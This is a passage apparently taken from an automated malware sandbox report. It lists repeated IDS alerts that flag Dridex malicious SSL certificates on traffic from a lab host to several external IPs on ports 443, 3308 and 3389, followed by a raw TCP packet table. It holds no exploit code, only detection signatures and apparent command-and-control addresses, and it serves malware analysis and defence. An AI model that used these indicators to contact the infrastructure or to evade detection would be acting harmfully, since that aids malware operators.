                                                                  01/11/21-16:53:08.533597TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926377.220.64.37192.168.2.22
                                                                  01/11/21-16:53:09.070760TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926480.86.91.27192.168.2.22
                                                                  01/11/21-16:53:09.589266TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492655.100.228.233192.168.2.22
                                                                  01/11/21-16:53:09.589266TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492655.100.228.233192.168.2.22
                                                                  01/11/21-16:53:10.686744TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434926777.220.64.37192.168.2.22
                                                                  01/11/21-16:53:11.289830TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084926880.86.91.27192.168.2.22
                                                                  01/11/21-16:53:12.480016TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492695.100.228.233192.168.2.22
                                                                  01/11/21-16:53:12.480016TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492695.100.228.233192.168.2.22
                                                                  01/11/21-16:53:13.591595TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927177.220.64.37192.168.2.22
                                                                  01/11/21-16:53:14.097596TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927280.86.91.27192.168.2.22
                                                                  01/11/21-16:53:14.618831TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492735.100.228.233192.168.2.22
                                                                  01/11/21-16:53:14.618831TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492735.100.228.233192.168.2.22
                                                                  01/11/21-16:53:15.664872TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927577.220.64.37192.168.2.22
                                                                  01/11/21-16:53:16.206337TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084927680.86.91.27192.168.2.22
                                                                  01/11/21-16:53:16.742400TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492775.100.228.233192.168.2.22
                                                                  01/11/21-16:53:16.742400TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492775.100.228.233192.168.2.22
                                                                  01/11/21-16:53:17.771725TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434927977.220.64.37192.168.2.22
                                                                  01/11/21-16:53:18.300834TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928080.86.91.27192.168.2.22
                                                                  01/11/21-16:53:18.829975TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492815.100.228.233192.168.2.22
                                                                  01/11/21-16:53:18.829975TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492815.100.228.233192.168.2.22
                                                                  01/11/21-16:53:19.877722TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928377.220.64.37192.168.2.22
                                                                  01/11/21-16:53:20.406206TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928480.86.91.27192.168.2.22
                                                                  01/11/21-16:53:20.953401TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492855.100.228.233192.168.2.22
                                                                  01/11/21-16:53:20.953401TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492855.100.228.233192.168.2.22
                                                                  01/11/21-16:53:22.025923TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434928777.220.64.37192.168.2.22
                                                                  01/11/21-16:53:22.557124TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084928880.86.91.27192.168.2.22
                                                                  01/11/21-16:53:23.087072TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492895.100.228.233192.168.2.22
                                                                  01/11/21-16:53:23.087072TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492895.100.228.233192.168.2.22
                                                                  01/11/21-16:53:24.154861TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929177.220.64.37192.168.2.22
                                                                  01/11/21-16:53:24.681751TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929280.86.91.27192.168.2.22
                                                                  01/11/21-16:53:25.220703TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492935.100.228.233192.168.2.22
                                                                  01/11/21-16:53:25.220703TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492935.100.228.233192.168.2.22
                                                                  01/11/21-16:53:26.273280TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929577.220.64.37192.168.2.22
                                                                  01/11/21-16:53:26.788529TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084929680.86.91.27192.168.2.22
                                                                  01/11/21-16:53:27.299104TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492975.100.228.233192.168.2.22
                                                                  01/11/21-16:53:27.299104TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389492975.100.228.233192.168.2.22
                                                                  01/11/21-16:53:28.460499TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434929977.220.64.37192.168.2.22
                                                                  01/11/21-16:53:28.993884TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930080.86.91.27192.168.2.22
                                                                  01/11/21-16:53:29.979511TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493015.100.228.233192.168.2.22
                                                                  01/11/21-16:53:29.979511TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493015.100.228.233192.168.2.22
                                                                  01/11/21-16:53:31.065753TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930377.220.64.37192.168.2.22
                                                                  01/11/21-16:53:31.590186TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930480.86.91.27192.168.2.22
                                                                  01/11/21-16:53:32.131234TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493055.100.228.233192.168.2.22
                                                                  01/11/21-16:53:32.131234TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493055.100.228.233192.168.2.22
                                                                  01/11/21-16:53:33.173336TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434930777.220.64.37192.168.2.22
                                                                  01/11/21-16:53:33.695474TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084930880.86.91.27192.168.2.22
                                                                  01/11/21-16:53:34.215381TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493095.100.228.233192.168.2.22
                                                                  01/11/21-16:53:34.215381TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493095.100.228.233192.168.2.22
                                                                  01/11/21-16:53:35.263087TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931177.220.64.37192.168.2.22
                                                                  01/11/21-16:53:35.795245TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931280.86.91.27192.168.2.22
                                                                  01/11/21-16:53:36.329124TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493135.100.228.233192.168.2.22
                                                                  01/11/21-16:53:36.329124TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493135.100.228.233192.168.2.22
                                                                  01/11/21-16:53:37.383411TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931577.220.64.37192.168.2.22
                                                                  01/11/21-16:53:37.905898TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084931680.86.91.27192.168.2.22
                                                                  01/11/21-16:53:38.441252TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493175.100.228.233192.168.2.22
                                                                  01/11/21-16:53:38.441252TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493175.100.228.233192.168.2.22
                                                                  01/11/21-16:53:39.461968TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434931977.220.64.37192.168.2.22
                                                                  01/11/21-16:53:39.969979TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932080.86.91.27192.168.2.22
                                                                  01/11/21-16:53:40.489105TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493215.100.228.233192.168.2.22
                                                                  01/11/21-16:53:40.489105TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493215.100.228.233192.168.2.22
                                                                  01/11/21-16:53:41.537757TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932377.220.64.37192.168.2.22
                                                                  01/11/21-16:53:42.058567TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932480.86.91.27192.168.2.22
                                                                  01/11/21-16:53:42.577964TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493255.100.228.233192.168.2.22
                                                                  01/11/21-16:53:42.577964TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493255.100.228.233192.168.2.22
                                                                  01/11/21-16:53:43.624651TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434932777.220.64.37192.168.2.22
                                                                  01/11/21-16:53:44.149962TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084932880.86.91.27192.168.2.22
                                                                  01/11/21-16:53:44.671597TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493295.100.228.233192.168.2.22
                                                                  01/11/21-16:53:44.671597TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493295.100.228.233192.168.2.22
                                                                  01/11/21-16:53:45.731394TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933177.220.64.37192.168.2.22
                                                                  01/11/21-16:53:46.248760TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933280.86.91.27192.168.2.22
                                                                  01/11/21-16:53:46.760255TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493335.100.228.233192.168.2.22
                                                                  01/11/21-16:53:46.760255TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493335.100.228.233192.168.2.22
                                                                  01/11/21-16:53:47.811931TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933577.220.64.37192.168.2.22
                                                                  01/11/21-16:53:48.352790TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084933680.86.91.27192.168.2.22
                                                                  01/11/21-16:53:48.895951TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493375.100.228.233192.168.2.22
                                                                  01/11/21-16:53:48.895951TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493375.100.228.233192.168.2.22
                                                                  01/11/21-16:53:49.944209TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434933977.220.64.37192.168.2.22
                                                                  01/11/21-16:53:50.465479TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934080.86.91.27192.168.2.22
                                                                  01/11/21-16:53:50.979923TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493415.100.228.233192.168.2.22
                                                                  01/11/21-16:53:50.979923TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493415.100.228.233192.168.2.22
                                                                  01/11/21-16:53:52.017842TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934377.220.64.37192.168.2.22
                                                                  01/11/21-16:53:52.547515TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934480.86.91.27192.168.2.22
                                                                  01/11/21-16:53:53.073637TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493455.100.228.233192.168.2.22
                                                                  01/11/21-16:53:53.073637TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493455.100.228.233192.168.2.22
                                                                  01/11/21-16:53:54.124472TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434934777.220.64.37192.168.2.22
                                                                  01/11/21-16:53:54.663698TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084934880.86.91.27192.168.2.22
                                                                  01/11/21-16:53:55.181428TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493495.100.228.233192.168.2.22
                                                                  01/11/21-16:53:55.181428TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493495.100.228.233192.168.2.22
                                                                  01/11/21-16:53:56.212049TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935177.220.64.37192.168.2.22
                                                                  01/11/21-16:53:56.738042TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935280.86.91.27192.168.2.22
                                                                  01/11/21-16:53:57.254622TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493535.100.228.233192.168.2.22
                                                                  01/11/21-16:53:57.254622TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493535.100.228.233192.168.2.22
                                                                  01/11/21-16:53:58.309088TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935577.220.64.37192.168.2.22
                                                                  01/11/21-16:53:58.833192TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084935680.86.91.27192.168.2.22
                                                                  01/11/21-16:53:59.380269TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493575.100.228.233192.168.2.22
                                                                  01/11/21-16:53:59.380269TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493575.100.228.233192.168.2.22
                                                                  01/11/21-16:54:00.425839TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434935977.220.64.37192.168.2.22
                                                                  01/11/21-16:54:00.956000TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936080.86.91.27192.168.2.22
                                                                  01/11/21-16:54:01.490066TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493615.100.228.233192.168.2.22
                                                                  01/11/21-16:54:01.490066TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493615.100.228.233192.168.2.22
                                                                  01/11/21-16:54:02.562264TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936377.220.64.37192.168.2.22
                                                                  01/11/21-16:54:03.076683TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936480.86.91.27192.168.2.22
                                                                  01/11/21-16:54:03.639232TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493655.100.228.233192.168.2.22
                                                                  01/11/21-16:54:03.639232TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493655.100.228.233192.168.2.22
                                                                  01/11/21-16:54:04.685773TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434936777.220.64.37192.168.2.22
                                                                  01/11/21-16:54:05.266596TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084936880.86.91.27192.168.2.22
                                                                  01/11/21-16:54:05.824689TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493695.100.228.233192.168.2.22
                                                                  01/11/21-16:54:05.824689TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493695.100.228.233192.168.2.22
                                                                  01/11/21-16:54:06.915022TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937177.220.64.37192.168.2.22
                                                                  01/11/21-16:54:07.442169TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937280.86.91.27192.168.2.22
                                                                  01/11/21-16:54:07.979603TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493735.100.228.233192.168.2.22
                                                                  01/11/21-16:54:07.979603TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493735.100.228.233192.168.2.22
                                                                  01/11/21-16:54:09.038178TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937577.220.64.37192.168.2.22
                                                                  01/11/21-16:54:09.562314TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084937680.86.91.27192.168.2.22
                                                                  01/11/21-16:54:10.086554TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493775.100.228.233192.168.2.22
                                                                  01/11/21-16:54:10.086554TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493775.100.228.233192.168.2.22
                                                                  01/11/21-16:54:11.129117TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434937977.220.64.37192.168.2.22
                                                                  01/11/21-16:54:11.653223TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938080.86.91.27192.168.2.22
                                                                  01/11/21-16:54:12.165487TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493815.100.228.233192.168.2.22
                                                                  01/11/21-16:54:12.165487TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493815.100.228.233192.168.2.22
                                                                  01/11/21-16:54:13.204226TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938377.220.64.37192.168.2.22
                                                                  01/11/21-16:54:13.732197TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938480.86.91.27192.168.2.22
                                                                  01/11/21-16:54:14.253442TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493855.100.228.233192.168.2.22
                                                                  01/11/21-16:54:14.253442TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493855.100.228.233192.168.2.22
                                                                  01/11/21-16:54:15.298644TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434938777.220.64.37192.168.2.22
                                                                  01/11/21-16:54:15.838118TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084938880.86.91.27192.168.2.22
                                                                  01/11/21-16:54:16.388703TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493895.100.228.233192.168.2.22
                                                                  01/11/21-16:54:16.388703TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493895.100.228.233192.168.2.22
                                                                  01/11/21-16:54:17.447758TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939177.220.64.37192.168.2.22
                                                                  01/11/21-16:54:17.972143TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939280.86.91.27192.168.2.22
                                                                  01/11/21-16:54:18.475582TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493935.100.228.233192.168.2.22
                                                                  01/11/21-16:54:18.475582TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493935.100.228.233192.168.2.22
                                                                  01/11/21-16:54:19.528350TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939577.220.64.37192.168.2.22
                                                                  01/11/21-16:54:20.046162TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084939680.86.91.27192.168.2.22
                                                                  01/11/21-16:54:20.560146TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493975.100.228.233192.168.2.22
                                                                  01/11/21-16:54:20.560146TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389493975.100.228.233192.168.2.22
                                                                  01/11/21-16:54:21.581721TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434939977.220.64.37192.168.2.22
                                                                  01/11/21-16:54:22.092958TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940080.86.91.27192.168.2.22
                                                                  01/11/21-16:54:22.641848TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494015.100.228.233192.168.2.22
                                                                  01/11/21-16:54:22.641848TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494015.100.228.233192.168.2.22
                                                                  01/11/21-16:54:23.702207TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)4434940377.220.64.37192.168.2.22
                                                                  01/11/21-16:54:24.228107TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)33084940480.86.91.27192.168.2.22
                                                                  01/11/21-16:54:24.755334TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494055.100.228.233192.168.2.22
                                                                  01/11/21-16:54:24.755334TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)3389494055.100.228.233192.168.2.22

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Jan 11, 2021 16:52:11.383333921 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.432667017 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.432809114 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.434149027 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.483485937 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.492672920 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.492796898 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.493716955 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.493798018 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.495330095 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.495413065 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.497365952 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.497448921 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.505867958 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.505944967 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.505964994 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.506021976 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.506048918 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.506102085 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.506277084 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.506331921 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.516563892 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.516658068 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.516774893 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.516839981 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.542587042 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.542685986 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.542700052 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.542776108 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.543279886 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.543344975 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.543462038 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.543524981 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.545084953 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.545171976 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.545243025 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.545317888 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555166006 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555233955 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555289030 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555347919 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555543900 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555597067 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555653095 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555692911 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555713892 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555728912 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555738926 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555774927 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555783987 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555816889 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.555830956 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.555862904 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.565701008 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.565742016 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.565773010 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.565789938 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.565794945 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.565831900 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.565845966 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.565875053 CET4916780192.168.2.22160.153.133.116
                                                                  Jan 11, 2021 16:52:11.591700077 CET8049167160.153.133.116192.168.2.22
                                                                  Jan 11, 2021 16:52:11.591748953 CET8049167160.153.133.116192.168.2.22
